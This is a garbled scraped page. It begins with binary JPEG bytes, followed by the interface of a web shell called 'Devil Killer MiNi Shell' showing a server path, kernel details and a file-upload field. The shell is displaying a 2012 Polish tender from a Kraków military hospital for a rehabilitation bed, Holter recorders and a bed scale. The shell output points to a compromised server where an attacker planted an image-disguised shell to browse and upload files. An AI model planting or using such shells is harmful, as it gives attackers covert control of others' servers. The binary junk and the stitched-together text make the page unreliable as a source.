JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120404/77227-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWA SPRZĘTU MEDYCZNEGO</b><br>
<b>Numer ogłoszenia: 77227 - 2012; data zamieszczenia: 04.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU MEDYCZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAŁĄCZNIK NR 1 - OPIS PRZEDMIOTU ZAMÓWIENIA 

Pakiet nr 1
Przedmiotem zamówienia jest dostawa łóżka rehabilitacyjnego  - 1 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33192120-9 
Producent Typ urządzenia Kraj pochodzenia Rok produkcji 2012
I.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Łóżko rehabilitacyjne	TAK	1 kpl.	
1	Zasilanie 230 V, 50 Hz z sygnalizacją włączenia do sieci w celu uniknięcia nieświadomego wyrwania kabla z gniazdka i uszkodzenia łóżka lub gniazdka	TAK		
2	Wbudowany akumulator do zasilania podczas transportu lub w sytuacjach zaniku prądu	TAK		
3	Długość zewnętrzna łóżka -  2250 mm (50mm) z możliwością przedłużania 	TAK
podać		
4	Szerokość zewnętrzna łóżka 1030 mm (50mm) 	TAK
podać		
5	Leże łóżka  4 - sekcyjne o  nowoczesnej konstrukcji opartej na trzech kolumnach cylindrycznych.	TAK		
6	Szczyty  tworzywowe jednoczęściowe bez elementów metalowych wyjmowane od strony nóg i głowy z możliwością zablokowania   na czas transportu przed przypadkowym wyjęciem	TAK		
7	Sterowanie elektryczne przy pomocy :
   -  panelu sterowniczego montowanego na         
      szczycie od strony nóg z możliwością  
      swobodnego wyjmowania i umieszczania na 
      szczycie czy też półce na pościel
-	pilota przewodowego 
-	paneli nożnych do sterowania przechyłami bocznymi z obu stron łóżka	TAK		
8	Regulacja elektryczna wysokości leża, mierzona od podłoża do górnej powierzchni leża w zakresie 380 mm do 760 mm ( 50 mm)	TAK
podać		
9	Możliwość uzyskania minimalnej wysokości krawędzi leża dla opuszczającego łóżko pacjenta poniżej 380 mm dzięki funkcji przechyłów bocznych	TAK
podać		
10	Regulacja elektryczna części plecowej w zakresie  75  5	TAK
podać		
11	Regulacja elektryczna części nożnej w zakresie 50  5	TAK
podać		
12	Regulacja elektryczna funkcji autokontur sterowana jednym przyciskiem przy pomocy pilota i panelu sterowniczego montowanego na szczycie łóżka od strony nóg	TAK		
13	Funkcja autoregresji zmniejszająca ryzyko powstawania odleżyn 	TAK		
14	Regulacja elektryczna pozycji Trendelenburga 20  4 - sterowanie z panelu sterowniczego montowanego na szczycie łóżka od strony nóg	TAK
podać		
15	Regulacja elektryczna pozycji anty-Trendelenburga  20  4 - sterowanie z panelu sterowniczego montowanego na szczycie łóżka od strony nóg	TAK
podać		
16	Regulacja elektryczna przechyłów bocznych z panelu sterowniczego oraz przycisków nożnych po obu stronach łóżka	TAK		
17	Pełna regulacja przechyłów bocznych w najniższym położeniu leża w celu ułatwienia opuszczania łóżka przez pacjenta min. 15 stopni	TAK		
18	Przyciski sterowania nożnego zabezpieczone przyciskiem nożnym świadomego uruchomienia regulacji	TAK		
19	Regulacja elektryczna do pozycji krzesła kardiologicznego - sterowanie przy pomocy jednego oznaczonego odpowiednim piktogramem przycisku na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	TAK		
20	Elektryczna funkcja CPR (co najmniej podwójną prędkością w stosunku do innych regulacji) pozycji ratującej życie - do reanimacji - sterowana przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	TAK		
21	Elektryczna, natychmiastowa pozycja egzaminacyjna-sterowana przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	TAK		
22	Wyłączniki/blokady  funkcji elektrycznych (na panelu sterowniczym) dla poszczególnych regulacji:
- regulacji wysokości
- regulacji części plecowej 
- regulacji części nożnej 
- regulacji pozycji Trendelenburga i 
  anty-Trendelenburga 
-regulacji przechyłów bocznych
-sterowań nożnych	TAK		
23	Zabezpieczenie przed nieświadomym uruchomieniem funkcji poprzez konieczność wciśnięcia przyciska uruchamiającego dostępność funkcji  . Przycisk świadomego uruchomienia systemu elektrycznego łóżka znajdujący się w każdym możliwym sterowaniu: panelu, pilocie oraz sterowniku nożnym dla personelu.	TAK		
24	Zabezpieczenie przed nieświadomym uruchomieniem sterowania nożnego poprzez konieczność świadomego podniesienia osłony chroniącej.	TAK		
25	Odłączenie wszelkich regulacji z pilota, sterowań nożnych i panelu po 180 sekundach nieużywania regulacji 	TAK		
26	Przycisk bezpieczeństwa (oznaczony charakterystycznie: STOP lub tez o innym oznaczeniu) natychmiastowe odłączenie wszystkich funkcji elektrycznych umieszczony na panelu sterowniczym.	TAK		
27	Elektryczna i mechaniczna funkcja CPR	TAK		
28	Koła z systemem sterowania jazdy na wprost i boki z centralnym systemem hamulcowym. 	TAK		
29	Pojedyncze koła jezdne o średnicy 150mm gwarantujące doskonałą mobilność łóżka	TAK		
30	Bezpieczne obciążenie robocze na poziomie minimum 180kg. Pozwalające na wszystkie możliwe regulacje przy tym obciążeniu bez narażenia bezpieczeństwa pacjenta i powstanie incydentu medycznego	TAK		
31	4 kółka odbojowe chroniące przed uszkodzeniami	TAK		
32	Wyposażenie:
-	Barierki boczne jednoczęściowe składane 1 kpl
-	materac nie przepuszczającym płynów infuzyjnych a przepuszczającym 
    powietrze 1szt.
-	uchwyt na worki do moczu po każdej stronie łóżka 4 szt. 
-	półka na pościel
-	podwójna rama ortopedyczna kompatybilna z posiadanymi przez Zamawiającego łóżkami firmy Linet typ Eleganza Standard z roku 2010 2 kpl
-	dodatkowy pilot przewodowy 1 szt.	TAK		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
A.	OKRES GWARANCJI		
1.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
2.		Czas reakcji na zgłoszoną awarię [godz.]	       max 48 godzin	PODAĆ  ILE
3.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
4.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
5.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
B.	SERWIS POGWARANCYJNY	
1.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
2.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
3.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
C.	SZKOLENIA	
1.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
2.		Personel techniczny w zakresie obsługi, eksploatacji oraz przeglądów pogwarancyjnych zgodnie z zaleceniami Producenta  potwierdzone certyfikatem w ramach zakupu sprzętu	TAK	
3.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ

Pakiet nr 2 
Przedmiotem zamówienia jest dostawa rejestratora ciśnienia tętniczego metodą Holtera  - 2 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33120000-7 
Producent 
Typ urządzenia Kraj pochodzenia Rok produkcji 2012
II.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I	Rejestrator ciśnienia tętniczego metodą Holtera	TAK	2 kpl	
1	Rejestrator fabrycznie nowy	TAK		
2	Pomiar ciśnienia metodą oscylometryczną	TAK		
3	Programowanie min. 3 okresów pomiarowych 
z poziomu dedykowanego oprogramowania	TAK		
4	Programowanie częstości pomiarów dla każdego okresu z poziomu dedykowanego oprogramowania	TAK		
5	Możliwość wykonania do 250 pomiarów	TAK		
6	Zakres pomiarów ciśnienia: 25 260mmHg	TAK		
7	Dokładność:  3mmHg	TAK		
8	Zakres pomiaru tętna: 40 200bpm	TAK		
9	2 rozmiary wielorazowych mankietów 
w zestawie z rejestratorem	TAK		
10	Mankiety wyposażone w elastyczne rękawy zapobiegające zsuwaniu się z ramienia pacjenta 	TAK		
11	Przycisk do ręcznego wykonania pomiaru poza zaprogramowanym harmonogramem	TAK		
12	Wbudowany wyświetlacz LCD z możliwością prezentacji wykonanego pomiaru ciśnienia i ikony dzień/noc	TAK		
13	Prezentacja wartości napięcia źródła zasilania rejestratora przy jego uruchomieniu	TAK		
14	Wymiary rejestratora: 	Podać		
15	Waga rejestratora:	Podać		
16	Zasilanie rejestratora bateryjne	TAK		
17	Możliwość zastosowania akumulatorów	TAK		
18	Możliwość analizy zapisu z rejestratora na posiadanej przez Zamawiającego starszej wersji oprogramowania systemu Holterowskiego Cardioscan 12 z roku 2005 firmy Oxford 	TAK		
19	Rekomendacja Europejskiego Towarzystwa Nadciśnienia Tętniczego	TAK		
II	OPROGRAMOWANIE	TAK		
1	Oprogramowanie w języku polskim	TAK		
2	Komunikacja z rejestratorem poprzez interface podłączany w komputerze do portu USB typ A	TAK		
3	Wbudowana baza danych pacjentów	TAK		
4	Wyświetlanie w formie tabelarycznej wszystkich wykonanych pomiarów z zaznaczeniem pomiarów wykonanych na żądanie	TAK		
5	Możliwość ręcznego wpisania komentarza do każdego pomiaru lub wybrania z listy proponowanych komentarzy	TAK		
6	Informacja o błędnym pomiarze	TAK		
7	Możliwość usuwania pomiarów z analizy	TAK		
8	Prezentacja wyników pomiarów ciśnienia częstości rytmu w formie graficznej (2 typy wykresów)	TAK		
9	Możliwość porównania 2 badań tego samego pacjenta	TAK		
10	Możliwość ręcznej edycji progów ciśnienia dla wykonanego badania	TAK		
11	Możliwość automatycznego ustawienia progów ciśnienia wg norm JNC7 AHA i ESH	TAK		
12	Możliwość rekonfiguracji okresów badania (zakresów czasowych) dla wykonanego badania	TAK		
13	Wbudowany kalkulator progów pediatrycznych	TAK		
14	Możliwość edycji danych pacjenta	TAK		
15	Możliwość wpisania (i edycji) przez lekarza wywiadu, aktualnego leczenia z podaniem leków, ich dawki i częstotliwości podawania, opisu	TAK		
16	Prezentacja wyników statystycznych badania:
- ciśnienie skurczowe
- ciśnienie rozkurczowe
- częstość rytmu
- MAP
- PP
- ładunek BP
- DIP podczas snu
z podziałem na okresy i łącznie dla całego badania	TAK		
17	Prezentacja średnich godzinowych w formie tabelarycznej wartości: ciśnienia skurczowego, rozkurczowego, częstości rytmu, MAP, PP, PRP/1000	TAK		
18	Prezentacja średnich godzinowych w formie graficznej wartości ciśnienia skurczowego, rozkurczowego, częstości rytmu. Możliwość porównania z innym badaniem tego samego pacjenta	TAK		
19	Możliwość wyboru automatycznego podsumowania badania na podstawie norm JNC7/AHA i ESH/AHA	TAK		
20	Możliwość konfiguracji raportu	TAK		
21	Możliwość eksportu raportu w formie pliku PDF	TAK		
22	Możliwość eksportu wykonanego badania do GDT i ASCII. 
Wbudowany konfigurator eksportu	TAK		
23	Możliwość eksportu wybranego badania za pomocą poczty e-mail	TAK		
24	Możliwość konfiguracji kolorystyki wykresów	TAK		
25	Możliwość testu poprawności komunikacji oprogramowania z rejestratorem	TAK		
26	Możliwość programowania różnych konfiguracji ustawień oprogramowania	TAK		
27	Możliwość konfiguracji wielu użytkowników z dostępem chronionym hasłem	TAK		
28	Funkcja automatycznego wylogowania użytkownika 
po określonym (konfigurowalnym) okresie bezczynności	TAK		
III	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
D.	OKRES GWARANCJI		
6.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
7.		Czas reakcji na zgłoszoną awarię [godz.]	         max 48 godzin	PODAĆ  ILE
8.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
9.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Zgodnie z zaleceniami producenta	PODAĆ  ILE
10.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
E.	SERWIS POGWARANCYJNY	
4.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
5.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
6.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
F.	SZKOLENIA	
4.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
5.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
6.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ

Pakiet nr 3 
Przedmiotem zamówienia jest dostawa rejestratorów EKG metodą Holtera  - 2 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33120000-0 
Producent 
Typ urządzenia 
Kraj pochodzenia Rok produkcji 2012
III.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Oprogramowanie do badań Holtera EKG	TAK	1 szt.	
1	Przeglądanie fragmentów EKG w trybie stronicowym	TAK		
2	Przeglądanie EKG w trybie wstęg (strip)	TAK		
3	Analiza w trybie prospektywnym i retrospektywnym	TAK		
4	Analiza automatyczna oparta na tworzeniu wzorców pobudzeń	TAK		
5	Automatyczna analiza arytmii komorowych i nadkomorowych	TAK		
6	Automatyczna analiza odcinka ST	TAK		
7	Możliwość konfiguracji parametrów analizy	TAK		
8	Możliwość korekty klasyfikacji każdego pobudzenia	TAK		
9	Automatyczny dobór przykładów ilustrujących epizody arytmii i zmiany odcinka ST	TAK		
10	Baza danych pacjentów i badań	TAK		
11	Możliwość konfiguracji raportu końcowego	TAK		
12	Możliwość analizy zapisów dłuższych niż 36 godzin	TAK		
13	Możliwość analizy zapisów z dwunastu odprowadzeń	TAK		
14	Możliwość wyboru analizowanych kanałów od 1 do 3	TAK		
15	Możliwość ustawienia punktów pomiarowych ST niezależnie dla każdego kanału	TAK		
16	Natychmiastowy dostęp do zapisu EKG z dowolnego poziomu analizy (tabele, trendy)	TAK		
17	Możliwość prezentacji pobudzeń z danej klasy w trybie stronicowym	TAK		
18		Możliwość bezpośredniej edycji tabeli arytmii	TAK		
19		Wykrywanie epizodów uniesień odcinka ST z uwzględnieniem nachylenia	TAK		
20		Analiza epizodów obniżenia odcinka ST z uwzględnieniem rodzaju nachylenia	TAK		
21		Trendy ST w formie wykresów 3D	TAK		
22		Automatyczna kalibracja	TAK		
23		Możliwość wyłączenia z analizy fragmentów zapisu	TAK		
24		Możliwość bezprzewodowej komunikacji z rejestratorem	TAK		
25		Archiwizacja danych	TAK		
II		Rejestrator EKG holterowski 3-kanałowy 2 szt.	TAK	2 szt.	
1		Rejestrator cyfrowy	TAK		
2		Liczba rejestrowanych odprowadzeń min. 3	TAK		
3		Czas rejestracji 48 godzin	TAK		
4		Liczba elektrod max. 7	TAK		
5		Automatyczna rejestracja momentu rozpoczęcia badania (data, godzina)	TAK		
6		Rejestracja bez kompresji danych	TAK		
7		Przycisk zdarzeń pacjenta	TAK		
8		Detekcja pików rozrusznika serca	TAK		
9		Zasilanie z jednej baterii AA 1,5 V	TAK		
10	Konsola stanu baterii oraz podłączenia elektrod	TAK		
11	Podgląd zapisu EKG na monitorze komputera w czasie rzeczywistym	TAK		
12	Zachowanie danych EKG bez zasilania rejestratora	TAK		
13		Sygnalizacja stanu aktywności rejestratora	TAK		
14		Masa max. 135 gram	TAK		
15	Możliwość analizy zapisu rejestratora na posiadanej przez Zamawiającego starszej wersji oprogramowania analizatora Holtera EKG z roku 2002 firmy Aspel.	TAK		
III	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
G.	OKRES GWARANCJI		
11.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
12.		Czas reakcji na zgłoszoną awarię [godz.]	         max 48 godzin	PODAĆ  ILE
13.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
14.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
15.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
H.	SERWIS POGWARANCYJNY	
7.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
8.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
9.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
I.	SZKOLENIA	
7.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
8.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
9.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ
Pakiet nr 4 
Przedmiotem zamówienia jest dostawa wagi łóżkowej  - 1 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33190000-8
Producent Typ urządzenia Kraj pochodzenia Rok produkcji 2012
IV.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I	Waga łóżkowa	TAK	1 kpl.	
1	Cztery moduły ważące połączone przewodami umożliwiające podłożenie pod łóżko o dowolnym rozstawie kół	TAK		
2	Podnośnik do unoszenia łóżka przystosowany do kół o średnicach w zakresie minimum od 100 do 200 mm	TAK		
3	Głowica pomiarowa z podświetlanym wyświetlaczem	TAK		
4	Zasilanie z odłączalnego zasilacza 230 VAC	TAK		
5	Dla zabezpieczenia ciągłości pomiaru w wypadku zaniku zasilania miernik wyposażony w zasilanie akumulatorowe	TAK		
6	W standardzie złącze RS 232	TAK		
7	Waga wyposażona w wózek transportowy pełniący jednocześnie funkcję stojaka wyświetlacza	TAK		
8	Obciążenie maksymalne minimum 500 kg	TAK		
9	Dokładność odczytu minimum 200 g	TAK		
10	Zakres tary minimum - 500 kg	TAK		
11	Wyświetlacz LCD z podświetleniem	TAK		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
J.	OKRES GWARANCJI		
16.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
17.		Czas reakcji na zgłoszoną awarię [godz.]	         max 48 godzin	PODAĆ  ILE
18.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
19.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Zgodnie z zaleceniami producenta	PODAĆ  ILE
20.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
K.	SERWIS POGWARANCYJNY	
10.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
11.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
12.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
L.	SZKOLENIA	
10.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
11.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
12.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ

Pakiet nr 5  
